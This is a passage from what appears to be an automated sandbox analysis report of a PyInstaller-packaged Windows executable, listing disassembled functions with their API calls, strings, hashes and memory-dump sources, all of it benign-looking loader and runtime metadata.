                                                                                                                                                                                                                • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                • API String ID: 190572456-4266016200
                                                                                                                                                                                                                • Opcode ID: f2f88704c5d1e061734efcee993fe9c6dd7b1185595c7391647c05c7e9d36fbf
                                                                                                                                                                                                                • Instruction ID: 0927370b84433d364c3744777fed1e6523ca314bf1eb605d280809529369d0b3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2f88704c5d1e061734efcee993fe9c6dd7b1185595c7391647c05c7e9d36fbf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6212C86AA7EB0390FB15CF14E85057723A1AF18F44B8494B5C85E863F8EF7CB589B214
                                                                                                                                                                                                                Function 00007FF67A601F50 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                                                                • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                                                                • API String ID: 2446303242-1601438679
                                                                                                                                                                                                                • Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                                                                                                                                                                                • Instruction ID: d8315f3842471467a4136fe77f173564663e82e0bcb8c37ea4083e5c06329ad5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AA16877628B8586E714CF21E49479BB360FB88B84F508129EB9D43B68CF3DE164CB40
                                                                                                                                                                                                                Function 00007FF67A62481C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                • API String ID: 808467561-2761157908
                                                                                                                                                                                                                • Opcode ID: 1922c43916b7ae2b1956b00aa5dfceaf9999fbe18ebc65017c42f663bf9222a2
                                                                                                                                                                                                                • Instruction ID: 77f528b8a19c1472c81ae6f477aada886073812103a2cb621eb0ddc65429d31d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1922c43916b7ae2b1956b00aa5dfceaf9999fbe18ebc65017c42f663bf9222a2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BEB2C173E282928BE735CE64D444BFE37A1FB54B88F505175DA0997AE8DF3CA9009B40
                                                                                                                                                                                                                Function 00007FF67A608570 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00007FF67A602A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A608597
                                                                                                                                                                                                                • FormatMessageW.KERNEL32 ref: 00007FF67A6085C6
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32 ref: 00007FF67A60861C
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67A6088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A602A14
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: MessageBoxW.USER32 ref: 00007FF67A602AF0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                                                • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                                                • API String ID: 2920928814-2573406579
                                                                                                                                                                                                                • Opcode ID: f8b909e9681ff6aa95198e912ee695dc1f7db9a724790c30e57e4941c2966439
                                                                                                                                                                                                                • Instruction ID: 12e6fccf38b16e42fa9e5c213358f1299b0f996496265acda73b639ef660bd07
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8b909e9681ff6aa95198e912ee695dc1f7db9a724790c30e57e4941c2966439
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92213073A38A4282EB60DF11E85467B7265FF88B85F940075D64DC66F4EF3CE145AB00
                                                                                                                                                                                                                Function 00007FF67A60C67C Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                • Opcode ID: be1c9f70274c1bfa0c57ec5397cb0351ad5ab78a1ed88338b70abc701b0ce300
                                                                                                                                                                                                                • Instruction ID: 5a2a7397d4afd246c4c34ba51716d6ca89c87dcaea257c0dd1776e2c4262c76f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: be1c9f70274c1bfa0c57ec5397cb0351ad5ab78a1ed88338b70abc701b0ce300
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45316E73629B818AEB60CF60E8447EE3360FB88B44F44403ADA4D87AA4DF38D648D700
                                                                                                                                                                                                                Function 00007FF67A61ACD8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                • Opcode ID: 008726ea591ffa8193f39527e8fee48c852db3d8167e5981d4ed2afc12fe266b
                                                                                                                                                                                                                • Instruction ID: c41bf7239cef4692b793fa8ed0085835a4660f546518de07068f192ab70fab7e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 008726ea591ffa8193f39527e8fee48c852db3d8167e5981d4ed2afc12fe266b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE315E37628B8186DB60CF25E8446BF73A0FB88B54F500275EA9D83BA8DF38D555DB00
                                                                                                                                                                                                                Function 00007FF67A621FE4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                • Opcode ID: 524e51f0921ab816a8e947fcf7c0d96cffb913f518e40e1861c067ce2dfcbe45
                                                                                                                                                                                                                • Instruction ID: 5c2af25f0d38f0d82fcce9281658111bb999b6d26469fdeb5cae1f8acb5c4641
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 524e51f0921ab816a8e947fcf7c0d96cffb913f518e40e1861c067ce2dfcbe45
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0B19123B2969681EA64DF32D8046BB6392EB54FE4F444171EE5D87BE5DE3CE441E300
                                                                                                                                                                                                                Function 00007FF67A60C560 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                • Opcode ID: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
                                                                                                                                                                                                                • Instruction ID: 5c52561a126f9bbe748b46611f8b8c2bc86a8046c9f2379e42e7c853d56f7016
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B113026B25F0589EB00CF70E8542BA33A4FB19B58F440E31DA6D867B4DF7CD1A59390
                                                                                                                                                                                                                Function 00007FF67A624380 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy_s
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1502251526-0
                                                                                                                                                                                                                • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                • Instruction ID: 50526d8a9866b1caae2769776b3f2f6c6ec0b6801f14bf1b2a63fb0a34b787ff
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EC10373B2928687EB24CF19A04866BB7A1F794B84F459135DB5E87B94DF3DE800CB40
                                                                                                                                                                                                                Function 00007FF67A62A0F8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 15204871-0
                                                                                                                                                                                                                • Opcode ID: 9ceb1b6cde6f3b2eda1c2fc70bd7e1e7d126a653b4f6510e73c9dfb920cedcd9
                                                                                                                                                                                                                • Instruction ID: 91ee32ee8524b306b4d27eff1ecbd371e00b9059ebcd8b51d55ff3723cfecd93
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ceb1b6cde6f3b2eda1c2fc70bd7e1e7d126a653b4f6510e73c9dfb920cedcd9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4B16973621B898AEB15CF29C8463693BA0F784FA8F188961DA5DC37B4CF79D451D700
                                                                                                                                                                                                                Function 00007FF67A613BE4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: $
                                                                                                                                                                                                                • API String ID: 0-227171996
                                                                                                                                                                                                                • Opcode ID: c4872f1e0598d0dbbdaab36ff9640d642bec52225eb732dc17c9982f250c6bea
                                                                                                                                                                                                                • Instruction ID: 7e0497e6ed9f381ebcc28ac6d9da55acdebc2f5f2ddef27ef737da3c52b5497b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4872f1e0598d0dbbdaab36ff9640d642bec52225eb732dc17c9982f250c6bea
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61E1A173A28A4686EBAC8E25C15053E2BA0FF45F48F145175DA0F877B4DF39E852E740
                                                                                                                                                                                                                Function 00007FF67A61E5B0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: e+000$gfff
                                                                                                                                                                                                                • API String ID: 0-3030954782
                                                                                                                                                                                                                • Opcode ID: dcea56467776434e5e52420c9f77f7819282e5f197dea1188040280776680b59
                                                                                                                                                                                                                • Instruction ID: f45ebac3a6dc599cb700e2c3761a905faff2c2f41b37fe4bdced61c257b04dc5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcea56467776434e5e52420c9f77f7819282e5f197dea1188040280776680b59
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551577BB282C587E7258A35D80477AAB91E744F94F888271CBAC87AE5DF3DD044D700
                                                                                                                                                                                                                Function 00007FF67A621038 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1010374628-0
                                                                                                                                                                                                                • Opcode ID: 97f539a7fe7fc551e0c66836eb46f4a9937a07ec542780b0bb5d867a01fb23bb
                                                                                                                                                                                                                • Instruction ID: d280b50e9dded92fc824490446cdca00b2d47525a72da95aa44a70b0c5c774f5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97f539a7fe7fc551e0c66836eb46f4a9937a07ec542780b0bb5d867a01fb23bb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8502C1B3B3D65681FA65EF11981027B2A84AF41F90F0586B5DE6DC67F2DE3DE801A300
                                                                                                                                                                                                                Function 00007FF67A61E11C Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: gfffffff
                                                                                                                                                                                                                • API String ID: 0-1523873471
                                                                                                                                                                                                                • Opcode ID: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
                                                                                                                                                                                                                • Instruction ID: 5cd5f22a6fbe102c8fe80d87b703955cb3d2efc684af6038ba8b28eb1269585d
